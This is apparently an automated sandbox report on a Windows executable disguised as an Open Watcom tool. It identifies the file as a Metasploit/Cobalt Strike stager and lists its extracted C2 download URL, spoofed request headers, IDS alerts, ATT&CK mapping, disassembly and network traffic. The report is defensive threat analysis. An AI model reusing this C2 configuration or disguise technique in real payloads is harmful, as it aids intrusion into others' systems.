Play interactive tour

Edit tour

Analysis Report icom32.exe

Overview

General Information

Sample Name:	icom32.exe
Analysis ID:	399805
MD5:	d1f66d78808b8cbd18804812f1a457a5
SHA1:	c99ee5407d446e9c0647e7749f307762d25e0143
SHA256:	7793c2fd34248236e83206fdd01b547436e966bcb6cae21adcbf61550b62daea
Infos:
Most interesting Screenshot:

Detection

Metasploit

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Metasploit Payload

C2 URLs / IPs found in malware configuration

Contains functionality to check if Internet connection is working

Contains functionality to dynamically determine API calls

Creates a DirectInput object (often for capturing keystrokes)

Detected potential crypto function

Entry point lies outside standard sections

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Classification

Startup

System is w10x64

icom32.exe (PID: 7040 cmdline: 'C:\Users\user\Desktop\icom32.exe' MD5: D1F66D78808B8CBD18804812F1A457A5)

cleanup

Malware Configuration

Threatname: Metasploit

{"Headers": "Accept-Encoding: binary\r\nHost: outlook.office.com\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATM)\r\n", "Type": "Metasploit Download", "URL": "http://adsec.pro/ssl/verify.crl"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp

Malware Configuration Extractor: Metasploit {"Headers": "Accept-Encoding: binary\r\nHost: outlook.office.com\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATM)\r\n", "Type": "Metasploit Download", "URL": "http://adsec.pro/ssl/verify.crl"}

Multi AV Scanner detection for submitted file

Show sources

Source: icom32.exe	Virustotal: Detection: 56%	Perma Link
Source: icom32.exe	Metadefender: Detection: 29%	Perma Link
Source: icom32.exe	ReversingLabs: Detection: 75%

Source: icom32.exe

Static PE information: 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2032785 ET TROJAN Cobalt Strike Stager Time Check M2 192.168.2.3:49710 -> 172.217.20.14:80
Source: Traffic	Snort IDS: 2032785 ET TROJAN Cobalt Strike Stager Time Check M2 192.168.2.3:49711 -> 172.217.20.14:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://adsec.pro/ssl/verify.crl

Contains functionality to check if Internet connection is working

Show sources

Source: C:\Users\user\Desktop\icom32.exe

Code function: 0_2_00401010 WSAStartup,WSAGetLastError,gethostbyname,WSACleanup,htons,socket,WSACleanup,connect,send,recv,closesocket,WSACleanup, google.com

0_2_00401010

Source: Joe Sandbox View

ASN Name: OnlineSASFR OnlineSASFR

Source: C:\Users\user\Desktop\icom32.exe

Code function: 0_2_00401010 WSAStartup,WSAGetLastError,gethostbyname,WSACleanup,htons,socket,WSACleanup,connect,send,recv,closesocket,WSACleanup,

0_2_00401010

Source: unknown

DNS traffic detected: queries for: adsec.pro

Source: icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmp	String found in binary or memory: https://adsec.pro/
Source: icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmp	String found in binary or memory: https://adsec.pro/ssl/verify.crl
Source: icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmp	String found in binary or memory: https://adsec.pro/ssl/verify.crlX
Source: icom32.exe, 00000000.00000002.780513408.000000000046C000.00000004.00000001.sdmp	String found in binary or memory: https://adsec.pro/ssl/verify.crle

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443

Source: icom32.exe, 00000000.00000002.780379298.0000000000429000.00000004.00000001.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\icom32.exe	Code function: 0_2_007000D7		0_2_007000D7
Source: C:\Users\user\Desktop\icom32.exe	Code function: 0_2_007000BA		0_2_007000BA

Source: icom32.exe, 00000000.00000000.643920569.0000000000411000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameff_dd.exe8 vs icom32.exe
Source: icom32.exe, 00000000.00000002.782887537.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs icom32.exe
Source: icom32.exe	Binary or memory string: OriginalFilenameff_dd.exe8 vs icom32.exe

Source: icom32.exe

Static PE information: 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal80.troj.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\icom32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\icom32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\icom32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\icom32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: icom32.exe	Virustotal: Detection: 56%
Source: icom32.exe	Metadefender: Detection: 29%
Source: icom32.exe	ReversingLabs: Detection: 75%

Source: C:\Users\user\Desktop\icom32.exe

Code function: 0_2_004092B0 LoadLibraryA,GetProcAddress,

0_2_004092B0

Source: initial sample

Static PE information: section where entry point is pointing to: AUTO

Source: icom32.exe	Static PE information: section name: AUTO
Source: icom32.exe	Static PE information: section name: DGROUP

Source: C:\Users\user\Desktop\icom32.exe TID: 7044

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\icom32.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: icom32.exe, 00000000.00000002.780553808.000000000047C000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\icom32.exe

Code function: 0_2_004092B0 LoadLibraryA,GetProcAddress,

0_2_004092B0

Source: C:\Users\user\Desktop\icom32.exe

Code function: 0_2_004097B0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,

0_2_004097B0

Source: C:\Users\user\Desktop\icom32.exe

Code function: 0_2_00406600 GetTimeZoneInformation,

0_2_00406600

Source: C:\Users\user\Desktop\icom32.exe

Code function: 0_2_00406CE0 GetEnvironmentStringsA,GetVersion,GetModuleFileNameA,GetCommandLineA,GetCommandLineW,GetModuleFileNameA,

0_2_00406CE0

Remote Access Functionality:

Yara detected Metasploit Payload

Show sources

Source: Yara match

File source: 00000000.00000002.780692160.0000000000700000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Path Interception	Virtualization/Sandbox Evasion11	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Network Connections Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
icom32.exe	57%	Virustotal		Browse
icom32.exe	30%	Metadefender		Browse
icom32.exe	76%	ReversingLabs	Win32.Trojan.Tiny

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://adsec.pro/ssl/verify.crl	0%	Avira URL Cloud	safe
https://adsec.pro/ssl/verify.crle	0%	Avira URL Cloud	safe
https://adsec.pro/	0%	Avira URL Cloud	safe
https://adsec.pro/ssl/verify.crlX	0%	Avira URL Cloud	safe
http://adsec.pro/ssl/verify.crl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
adsec.pro	163.172.159.210	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://adsec.pro/ssl/verify.crl	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://adsec.pro/ssl/verify.crl	icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://adsec.pro/ssl/verify.crle	icom32.exe, 00000000.00000002.780513408.000000000046C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://adsec.pro/	icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://adsec.pro/ssl/verify.crlX	icom32.exe, 00000000.00000002.780487108.0000000000463000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
163.172.159.210	adsec.pro	United Kingdom		12876	OnlineSASFR	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	399805
Start date:	29.04.2021
Start time:	09:43:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	icom32.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 91.5% (good quality ratio 81.5%) Quality average: 79% Quality standard deviation: 33.9%
HCA Information:	Successful, ratio: 56% Number of executed functions: 12 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Excluded IPs from analysis (whitelisted): 52.113.196.254, 168.61.161.212, 13.107.3.254, 13.107.246.254, 13.64.90.137, 172.217.20.14, 20.82.210.154, 92.122.213.249, 92.122.213.247, 52.155.217.156, 20.54.26.129, 67.27.233.254, 8.248.143.254, 8.248.141.254, 67.27.233.126, 67.26.73.254, 2.20.142.209, 2.20.142.210, 20.82.209.104 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, s-ring.msedge.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, google.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OnlineSASFR	n6osajjc938.exe	Get hash	malicious	Browse	163.172.32.74
	fo6xVy841Q.rtf	Get hash	malicious	Browse	51.15.139.10
	Payment slip.xlsx	Get hash	malicious	Browse	51.15.139.10
	q9TSaoraAu.exe	Get hash	malicious	Browse	163.172.11.80
	ZlBBoxINlE.exe	Get hash	malicious	Browse	163.172.11.80
	lFxNHPHe4v.exe	Get hash	malicious	Browse	163.172.11.80
	shipping doc.xlsx	Get hash	malicious	Browse	51.15.139.10
	PI_63455MV_REVISED.xlsx	Get hash	malicious	Browse	51.15.139.10
	USD.xlsx	Get hash	malicious	Browse	51.15.139.10
	Offer from China.xlsx	Get hash	malicious	Browse	51.15.139.10
	Revised SOA.xlsx	Get hash	malicious	Browse	51.15.139.10
	PRC-20-518 ORIGINAL.xlsx	Get hash	malicious	Browse	51.15.139.10
	PO.0245GT.xlsx	Get hash	malicious	Browse	51.15.139.10
	NEW ORDER.xlsx	Get hash	malicious	Browse	51.15.139.10
	M.V. OMNI TIGRIS.xlsx	Get hash	malicious	Browse	51.15.139.10
	Fox(04-09-15-47-23).xlsx	Get hash	malicious	Browse	51.15.139.10
	Quotation of 210409 from KOSEN-1.xlsx	Get hash	malicious	Browse	51.15.139.10
	REMITTANCE_ADVICE_REF0000360261.xlsx	Get hash	malicious	Browse	51.15.139.10
	PRC-20-518 ORIGINAL.xlsx	Get hash	malicious	Browse	51.15.139.10
	REMITTANCE ADVICE REF0000360261.xlsx	Get hash	malicious	Browse	51.15.139.10

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.858901157309694
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	icom32.exe
File size:	62464
MD5:	d1f66d78808b8cbd18804812f1a457a5
SHA1:	c99ee5407d446e9c0647e7749f307762d25e0143
SHA256:	7793c2fd34248236e83206fdd01b547436e966bcb6cae21adcbf61550b62daea
SHA512:	f0eaa9dffc896828dbaa9cca42d6993a5778eb30997804e35ee68ac41ff01218b668c2997456032930bc68fe9565bb3feefa7115de4be7ac7887bdb93cf343a5
SSDEEP:	768:1TrDPve1+1sx5RLyu4mc1MZg1skv2PWvXdMW6:13DPv2+1sx5Rv7+ekvRk
File Content Preview:	MZ......................@...............................................!..L.!This is a Windows NT windowed executable..$.......PE..L...F$R`............................hY............@..........................0....................... .....................

File Icon


Icon Hash:	93132d27232587c1

Static PE Info

General
Entrypoint:	0x405968
Entrypoint Section:	AUTO
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE
DLL Characteristics:
Time Stamp:	0x60522446 [Wed Mar 17 15:46:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	11
File Version Major:	1
File Version Minor:	11
Subsystem Version Major:	1
Subsystem Version Minor:	11
Import Hash:	3909bf4a070f081062accde80126238a

Entrypoint Preview

Instruction
jmp 00007FBBEC588678h
add edx, dword ptr [eax]
inc eax
add byte ptr [edi+70h], cl
outsb
and byte ptr [edi+61h], dl
je 00007FBBEC586CF5h
outsd
insd
and byte ptr [ebx+2Fh], al
inc ebx
sub ebp, dword ptr [ebx]
xor esi, dword ptr [edx]
and byte ptr [edx+75h], dl
outsb
sub eax, 656D6954h
and byte ptr [ebx+79h], dh
jnc 00007FBBEC586D06h
insd
and byte ptr [eax+6Fh], dl
jc 00007FBBEC586D06h
imul ebp, dword ptr [edi+6Eh], 6F432073h
jo 00007FBBEC586D0Bh
jc 00007FBBEC586CFBh
push 43282074h
sub dword ptr [eax], esp
push ebx
jns 00007FBBEC586CF4h
popad
jnc 00007FBBEC586CF7h
sub al, 20h
dec ecx
outsb
arpl word ptr [esi], bp
and byte ptr [ecx], dh
cmp dword ptr [eax], edi
cmp byte ptr [32303032h], ch
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
ret
ret
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push ecx
mov ecx, eax
mov eax, edx
mov edx, dword ptr [ecx]
call 00007FBBEC588A59h
inc dword ptr [ecx+10h]
pop ecx
ret
lea eax, dword ptr [eax+00000000h]
lea edx, dword ptr [edx+00000000h]
lea eax, dword ptr [eax+00h]
push ecx
push esi
push edi
push ebp
mov esi, eax
mov eax, dword ptr [eax+10h]
call dword ptr [0040F518h]
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [eax+0Ch]
cmp ecx, 01h
je 00007FBBEC586CA1h
test ecx, ecx
jne 00007FBBEC586D17h
mov dword ptr [eax+0Ch], 00000001h
mov ebp, dword ptr [esi+0Ch]
mov eax, dword ptr [esi+08h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe000	0x553	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0x800
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11000	0x700
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
AUTO	0x1000	0xcfa6	0xd000	False	0.439584585337	data	5.85502460574	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.idata	0xe000	0x553	0x600	False	0.432942708333	data	4.54022455633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
DGROUP	0xf000	0x1780	0xa00	False	0.397265625	PDP-11 UNIX/RT ldp	3.81458751198	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x11000	0x0	0x800	False	0.779296875	data	6.21951327485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0x0	0x800	False	0.31005859375	data	3.23020644226	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x120fc	0x2e8	data
RT_GROUP_ICON	0x123e4	0x14	data
RT_VERSION	0x123f8	0x2e8	data

Imports

DLL	Import
KERNEL32.DLL	CloseHandle, CreateEventA, CreateFileA, ExitProcess, FlushFileBuffers, FreeEnvironmentStringsA, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetCurrentThreadId, GetEnvironmentStringsA, GetFileType, GetLastError, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetOEMCP, GetProcAddress, GetStdHandle, GetTimeZoneInformation, GetVersion, LoadLibraryA, MultiByteToWideChar, SetConsoleCtrlHandler, SetEnvironmentVariableA, SetEnvironmentVariableW, SetFilePointer, SetStdHandle, SetUnhandledExceptionFilter, Sleep, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualQuery, WideCharToMultiByte, WriteFile
USER32.DLL	CharUpperA, MessageBoxA
WS2_32.DLL	WSACleanup, WSAGetLastError, WSAStartup, closesocket, connect, gethostbyname, htons, recv, send, socket

Version Infos

Description	Data
LegalCopyright	Portions Copyright 2002 Sybase, Inc.
InternalName	ff_dd
FileVersion	1.90
CompanyName	openwatcom.org
ProductName	Open Watcom
ProductVersion	1.90
FileDescription	Open Watcom Dialog Editor
OriginalFilename	ff_dd.exe
Translation	0x0409 0x04b0

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/29/21-09:39:47.568436	TCP	2032785	ET TROJAN Cobalt Strike Stager Time Check M2	49710	80	192.168.2.3	172.217.20.14
04/29/21-09:39:47.906566	TCP	2032785	ET TROJAN Cobalt Strike Stager Time Check M2	49711	80	192.168.2.3	172.217.20.14

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2021 09:45:17.506817102 CEST	49751	443	192.168.2.4	163.172.159.210
Apr 29, 2021 09:45:17.561675072 CEST	443	49751	163.172.159.210	192.168.2.4
Apr 29, 2021 09:45:17.562963009 CEST	49751	443	192.168.2.4	163.172.159.210
Apr 29, 2021 09:45:17.602128983 CEST	49751	443	192.168.2.4	163.172.159.210
Apr 29, 2021 09:45:17.657506943 CEST	443	49751	163.172.159.210	192.168.2.4
Apr 29, 2021 09:45:49.966147900 CEST	49751	443	192.168.2.4	163.172.159.210

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2021 09:44:39.849407911 CEST	58028	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:39.898358107 CEST	53	58028	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:40.127150059 CEST	53097	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:40.175745010 CEST	53	53097	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:40.238815069 CEST	49257	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:40.287410021 CEST	53	49257	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:40.463089943 CEST	62389	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:40.511663914 CEST	53	62389	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:42.284430981 CEST	49910	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:42.336164951 CEST	53	49910	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:43.230581999 CEST	55854	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:43.282201052 CEST	53	55854	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:44.722270012 CEST	64549	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:44.771003008 CEST	53	64549	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:46.606694937 CEST	63153	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:46.671905994 CEST	53	63153	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:46.782677889 CEST	52991	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:46.834234953 CEST	53	52991	8.8.8.8	192.168.2.4
Apr 29, 2021 09:44:48.069870949 CEST	53700	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:44:48.120404959 CEST	53	53700	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:05.267213106 CEST	51726	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:05.318824053 CEST	53	51726	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:06.322359085 CEST	56794	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:06.371273041 CEST	53	56794	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:07.260894060 CEST	56534	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:07.309762001 CEST	53	56534	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:08.172406912 CEST	56627	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:08.224104881 CEST	53	56627	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:09.299187899 CEST	56621	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:09.347901106 CEST	53	56621	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:09.953521967 CEST	63116	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:10.002288103 CEST	53	63116	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:10.229990959 CEST	64078	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:10.278759956 CEST	53	64078	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:11.293641090 CEST	64801	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:11.345155001 CEST	53	64801	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:12.270354033 CEST	61721	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:12.319127083 CEST	53	61721	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:13.210309029 CEST	51255	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:13.262125969 CEST	53	51255	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:14.089761019 CEST	61522	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:14.157269955 CEST	53	61522	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:16.664444923 CEST	52337	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:16.713857889 CEST	53	52337	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:16.874193907 CEST	55046	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:16.936476946 CEST	53	55046	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:17.269332886 CEST	49612	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:17.487935066 CEST	53	49612	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:21.577204943 CEST	49285	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:21.629272938 CEST	53	49285	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:22.661989927 CEST	50601	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:22.713489056 CEST	53	50601	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:27.527753115 CEST	60875	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:27.653892994 CEST	53	60875	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:28.183489084 CEST	56448	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:28.302719116 CEST	53	56448	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:28.829015017 CEST	59172	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:28.886357069 CEST	53	59172	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:29.120815039 CEST	62420	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:29.200084925 CEST	53	62420	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:29.292609930 CEST	60579	53	192.168.2.4	8.8.8.8
Apr 29, 2021 09:45:29.341743946 CEST	53	60579	8.8.8.8	192.168.2.4
Apr 29, 2021 09:45:29.909874916 CEST	50183	53	192.168.2.4	8.8.8.8
